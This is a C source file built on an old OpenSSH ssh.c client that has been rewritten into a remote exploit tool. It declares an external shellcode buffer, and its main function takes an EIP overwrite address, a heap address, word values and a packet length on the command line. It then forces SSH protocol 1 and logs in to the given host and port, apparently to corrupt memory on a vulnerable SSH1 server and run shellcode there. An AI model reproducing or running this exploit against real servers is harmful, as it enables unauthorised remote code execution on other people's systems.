/*
 * Author: Tatu Ylonen <ylo@cs.hut.fi>
 * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
 *					  All rights reserved
 * Ssh client program.	This program can be used to log into a remote machine.
 * The software supports strong authentication, encryption, and forwarding
 * of X11, TCP/IP, and authentication connections.
 *
 * As far as I am concerned, the code I have written for this software
 * can be used freely for any purpose.	Any derived versions of this
 * software must be clearly marked as such, and if the derived work is
 * incompatible with the protocol description in the RFC file, it must be
 * called by a name other than "ssh" or "Secure Shell".
 *
 * Copyright (c) 1999 Niels Provos.  All rights reserved.
 *
 * Modified to work with SSL by Niels Provos <provos@citi.umich.edu>
 * in Canada (German citizen).
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *	  notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *	  notice, this list of conditions and the following disclaimer in the
 *	  documentation and/or other materials provided with the distribution.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
 * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
 * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
 * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
 * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
 * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
 * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
 * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */

#include "includes.h"
RCSID("$OpenBSD: ssh.c,v 1.144 2001/09/24 03:38:58 stevesk Exp $");

#include <openssl/evp.h>
#include <openssl/err.h>

#include "ssh.h"
#include "ssh1.h"
#include "ssh2.h"
#include "compat.h"
#include "cipher.h"
#include "xmalloc.h"
#include "packet.h"
#include "buffer.h"
#include "uidswap.h"
#include "channels.h"
#include "key.h"
#include "authfd.h"
#include "authfile.h"
#include "pathnames.h"
#include "clientloop.h"
#include "log.h"
#include "readconf.h"
#include "sshconnect.h"
#include "tildexpand.h"
#include "dispatch.h"
#include "misc.h"
#include "kex.h"
#include "mac.h"
#include "sshtty.h"

#ifdef SMARTCARD
#include <openssl/engine.h>
#include "scard.h"
#endif

#ifdef HAVE___PROGNAME
extern char *__progname;
#else
char *__progname;
#endif

/* Flag indicating whether IPv4 or IPv6.  This can be set on the command line.
   Default value is AF_UNSPEC means both IPv4 and IPv6. */
#ifdef IPV4_DEFAULT
int IPv4or6 = AF_INET;
#else
int IPv4or6 = AF_UNSPEC;
#endif

/* Flag indicating whether debug mode is on.  This can be set on the command line. */
int debug_flag = 0;

/* Flag indicating whether a tty should be allocated */
int tty_flag = 0;
int no_tty_flag = 0;
int force_tty_flag = 0;

/* don't exec a shell */
int no_shell_flag = 0;

/*
 * Flag indicating that nothing should be read from stdin.	This can be set
 * on the command line.
 */
int stdin_null_flag = 0;

/*
 * Flag indicating that ssh should fork after authentication.  This is useful
 * so that the pasphrase can be entered manually, and then ssh goes to the
 * background.
 */
int fork_after_authentication_flag = 0;

/*
 * General data structure for command line options and options configurable
 * in configuration files.	See readconf.h.
 */
Options options;

/* optional user configfile */
char *config = NULL;

/*
 * Name of the host we are connecting to.  This is the name given on the
 * command line, or the HostName specified for the user-supplied name in a
 * configuration file.
 */
char *host;

/* socket address the host resolves to */
struct sockaddr_storage hostaddr;

/*
 * Flag to indicate that we have received a window change signal which has
 * not yet been processed.	This will cause a message indicating the new
 * window size to be sent to the server a little later.  This is volatile
 * because this is updated in a signal handler.
 */
volatile int received_window_change_signal = 0;

/* Private host keys. */
struct {
	Key 	**keys;
	int nkeys;
} sensitive_data;

/* Original real UID. */
uid_t original_real_uid;

/* command to be executed */
Buffer command;

/* Should we execute a command or invoke a subsystem? */
int subsystem_flag = 0;

static void load_public_identity_files(void);

extern char *shellcode;
extern unsigned long exp_packet_len;
extern unsigned long exp_h_addr;
extern unsigned long exp_eip_addr;
extern unsigned long exp_eip_highword;
extern unsigned long exp_highword;
extern int exp_change_lowword;
extern unsigned long exp_eip_lowword;
extern unsigned long exp_lowword;
extern unsigned long exp_zero_dword;

/*
 * Main program for the ssh client.
 */
int
main(int ac,char **av)
{
	int i, exit_status, cerr;
	char buf[256];
	struct stat st;
	struct passwd *pw;
	unsigned long max;
	uid_t original_effective_uid;

	__progname = get_progname(av[0]);
	init_rng();

	/*
	 * Save the original real uid.	It will be needed later (uid-swapping
	 * may clobber the real uid).
	 */
	original_real_uid = getuid();
	original_effective_uid = geteuid();

	/* Get user data. */
	pw = getpwuid(original_real_uid);
	if (!pw) {
		log("You don't exist, go away!");
		exit(1);
	}
	/* Take a copy of the returned structure. */
	pw = pwcopy(pw);

	/*
	 * Use uid-swapping to give up root privileges for the duration of
	 * option processing.  We will re-instantiate the rights when we are
	 * ready to create the privileged port, and will permanently drop
	 * them when the port has been created (actually, when the connection
	 * has been made, as we may need to create the port several times).
	 */
	temporarily_use_uid(pw);

	/*
	 * Set our umask to something reasonable, as some files are created
	 * with the default umask.	This will make them world-readable but
	 * writable only by the owner, which is ok for all files for which we
	 * don't set the modes explicitly.
	 */
	umask(022);

	/* Initialize option structure to indicate that no values have been set. */
	initialize_options(&options);

	/* Parse command-line arguments. */
	host = NULL;

	if(ac<8)
	{
exp_usage:
		fprintf(stderr,"usage: %s (-z <zero addr>) <packetlen> <h addr> <eip addr> "
			"<eip highword> <to highword> (<eip lowword> <to lowword>)"
			"host port\n     : <packet len> has to be able to divide among 8192.\n"
			"     : <zero addr>'s contents should be zero.\n",
			__progname);
		exit(0);
	}
	if(av[1][0]=='-' && av[1][1]=='z')
	{
		exp_zero_dword = strtoul(av[2],0,16);
		if(errno==ERANGE)
			goto exp_usage;
		ac -= 2;
		av += 2;
	}
	if(ac>8)
	{
		exp_change_lowword = 1;
		exp_eip_lowword = strtoul(av[6],0,16);
		if(errno==ERANGE)
			goto exp_usage;
		exp_lowword = strtoul(av[7],0,16);
		if(errno==ERANGE)
			goto exp_usage;
		host = av[8];
		options.port = a2port(av[9]);
	}
	else
	{
		exp_change_lowword = 0;
		host = av[6];
		options.port = a2port(av[7]);
	}
	exp_packet_len = strtoul(av[1],0,10);
	if(errno==ERANGE || (exp_packet_len%8192))
	{
		goto exp_usage;
	}
	if(exp_packet_len>(262144-8192))
	{
		fprintf(stderr,"packet len too long : max[%u]\n",262144-8192);
		exit(-1);
	}
	exp_h_addr = strtoul(av[2],0,16);
	if(errno==ERANGE)
		goto exp_usage;
	exp_eip_addr = strtoul(av[3],0,16);
	if(errno==ERANGE)
		goto exp_usage;
	exp_eip_highword = strtoul(av[4],0,16);
	if(errno==ERANGE)
		goto exp_usage;
	exp_highword = strtoul(av[5],0,16);
	if(errno==ERANGE)
		goto exp_usage;
	max = exp_eip_highword > exp_highword ? exp_eip_highword : exp_highword;
	if(exp_change_lowword)
	{
		max = max > exp_eip_lowword ? max : exp_eip_lowword;
		max = max > exp_lowword ? max : exp_lowword;
	}
	max <<= 3;
	max = max > 90112 ? max : 90112;
	if(exp_packet_len<max)
	{
		fprintf(stderr,"packet len too short : min[%lu]\n",(max+8191)&~8191);
		exit(-1);
	}

	fprintf(stderr,"packet len   [%lu]\n",exp_packet_len+8192);
	fprintf(stderr,"h addr       [0x%lx]\n",exp_h_addr);
	fprintf(stderr,"eip addr     [0x%lx]\n",exp_eip_addr);
	fprintf(stderr,"eip highword [0x%lx]\n",exp_eip_highword);
	fprintf(stderr,"to highword  [0x%lx]\n",exp_highword);
	if(exp_change_lowword)
	{
		fprintf(stderr,"eip lowword  [0x%lx]\n",exp_eip_lowword);
		fprintf(stderr,"to lowword   [0x%lx]\n",exp_lowword);
	}
	fprintf(stderr,"zero addr    [0x%lx]\n",exp_zero_dword);

	options.protocol = SSH_PROTO_1;
	options.user = "ABCDEFGH";

	SSLeay_add_all_algorithms();
	ERR_load_crypto_strings();

	/* Initialize the command to execute on remote host. */
	buffer_init(&command);

	tty_flag = 1;

	/* Force no tty*/
	if (no_tty_flag)
		tty_flag = 0;
	/* Do not allocate a tty if stdin is not a tty. */
	if (!isatty(fileno(stdin)) && !force_tty_flag) {
		if (tty_flag)
			log("Pseudo-terminal will not be allocated because stdin is not a terminal.");
		tty_flag = 0;
	}

	/*
	 * Read per-user configuration file.  Ignore the system wide config
	 * file if the user specifies a config file on the command line.
	 */
	if (config != NULL) {
		if (!read_config_file(config, host, &options))
			fatal("Can't open user config file %.100s: "
				"%.100s", config, strerror(errno));
	} else	{
		snprintf(buf, sizeof buf, "%.100s/%.100s", pw->pw_dir,
			_PATH_SSH_USER_CONFFILE);

		/* Read systemwide configuration file. */
		(void)read_config_file(_PATH_HOST_CONFIG_FILE, host, &options);
		(void)read_config_file(buf, host, &options);
	}

	/* Fill configuration defaults. */
	fill_default_options(&options);

	seed_rng();

	/* Disable rhosts authentication if not running as root. */
	if (original_effective_uid != 0 || !options.use_privileged_port) {
		debug("Rhosts Authentication disabled, "
			"originating port will not be trusted.");
		options.rhosts_authentication = 0;
	}
	/* Restore our superuser privileges. */
	restore_uid();

	/* Open a connection to the remote host. */
	cerr = ssh_connect(host, &hostaddr, options.port,
		options.connection_attempts,
		original_effective_uid != 0 || !options.use_privileged_port,
		pw, options.proxy_command);

	/*
	 * If we successfully made the connection, load the host private key
	 * in case we will need it later for combined rsa-rhosts
	 * authentication. This must be done before releasing extra
	 * privileges, because the file is only readable by root.
	 */
	sensitive_data.nkeys = 0;
	sensitive_data.keys = NULL;
	if (!cerr && (options.rhosts_rsa_authentication ||
		options.hostbased_authentication)) {
		sensitive_data.nkeys = 3;
		sensitive_data.keys = xmalloc(sensitive_data.nkeys*sizeof(Key));
		sensitive_data.keys[0] = key_load_private_type(KEY_RSA1,
			_PATH_HOST_KEY_FILE, "", NULL);
		sensitive_data.keys[1] = key_load_private_type(KEY_DSA,
			_PATH_HOST_DSA_KEY_FILE, "", NULL);
		sensitive_data.keys[2] = key_load_private_type(KEY_RSA,
			_PATH_HOST_RSA_KEY_FILE, "", NULL);
	}
/*
fprintf(stderr,"press return: ");
getchar();
*/
	/*
	 * Get rid of any extra privileges that we may have.  We will no
	 * longer need them.  Also, extra privileges could make it very hard
	 * to read identity files and other non-world-readable files from the
	 * user's home directory if it happens to be on a NFS volume where
	 * root is mapped to nobody.
	 */

	/*
	 * Note that some legacy systems need to postpone the following call
	 * to permanently_set_uid() until the private hostkey is destroyed
	 * with RSA_free().  Otherwise the calling user could ptrace() the
	 * process, read the private hostkey and impersonate the host.
	 * OpenBSD does not allow ptracing of setuid processes.
	 */
	permanently_set_uid(pw);

	/*
	 * Now that we are back to our own permissions, create ~/.ssh
	 * directory if it doesn\'t already exist.
	 */
	snprintf(buf, sizeof buf, "%.100s%s%.100s",pw->pw_dir,
			strcmp(pw->pw_dir, "/") ? "/" : "",_PATH_SSH_USER_DIR);
	if (stat(buf, &st) < 0)
		if (mkdir(buf, 0700) < 0)
			error("Could not create directory '%.200s'.", buf);

	/* Check if the connection failed, and try "rsh" if appropriate. */
	if (cerr) {
		if (options.port != 0)
			log("Secure connection to %.100s on port %hu refused; "
				"reverting to insecure method",
				host, options.port);
		else
			log("Secure connection to %.100s refused; "
				"reverting to insecure method.", host);

		exit(1);
	}
	/* load options.identity_files */
	load_public_identity_files();

	/* Expand ~ in known host file names. */
	/* XXX mem-leaks: */
	options.system_hostfile =
		tilde_expand_filename(options.system_hostfile, original_real_uid);
	options.user_hostfile =
		tilde_expand_filename(options.user_hostfile, original_real_uid);
	options.system_hostfile2 =
		tilde_expand_filename(options.system_hostfile2, original_real_uid);
	options.user_hostfile2 =
		tilde_expand_filename(options.user_hostfile2, original_real_uid);

	/* Log into the remote system.	This never returns if the login fails. */
	ssh_login(sensitive_data.keys, sensitive_data.nkeys,
		host, (struct sockaddr *)&hostaddr, pw);

	/* We no longer need the private host keys.  Clear them now. */
	if (sensitive_data.nkeys != 0) {
		for (i = 0; i < sensitive_data.nkeys; i++) {
			if (sensitive_data.keys[i] != NULL) {
				/* Destroys contents safely */
				debug3("clear hostkey %d", i);
				key_free(sensitive_data.keys[i]);
				sensitive_data.keys[i] = NULL;
			}
		}
		xfree(sensitive_data.keys);
	}
	for (i = 0; i < options.num_identity_files; i++) {
		if (options.identity_files[i]) {
			xfree(options.identity_files[i]);
			options.identity_files[i] = NULL;
		}
		if (options.identity_keys[i]) {
			key_free(options.identity_keys[i]);
			options.identity_keys[i] = NULL;
		}
	}
#if 0
	exit_status = ssh_session();
#endif
	packet_close();
	return exit_status;
}

static void
load_public_identity_files(void)
{
	char *filename;
	Key *public;
	int i = 0;

	for (; i < options.num_identity_files; i++) {
		filename = tilde_expand_filename(options.identity_files[i],
			original_real_uid);
		public = key_load_public(filename, NULL);
		debug("identity file %s type %d", filename,
			public ? public->type : -1);
		xfree(options.identity_files[i]);
		options.identity_files[i] = filename;
		options.identity_keys[i] = public;
	}
}
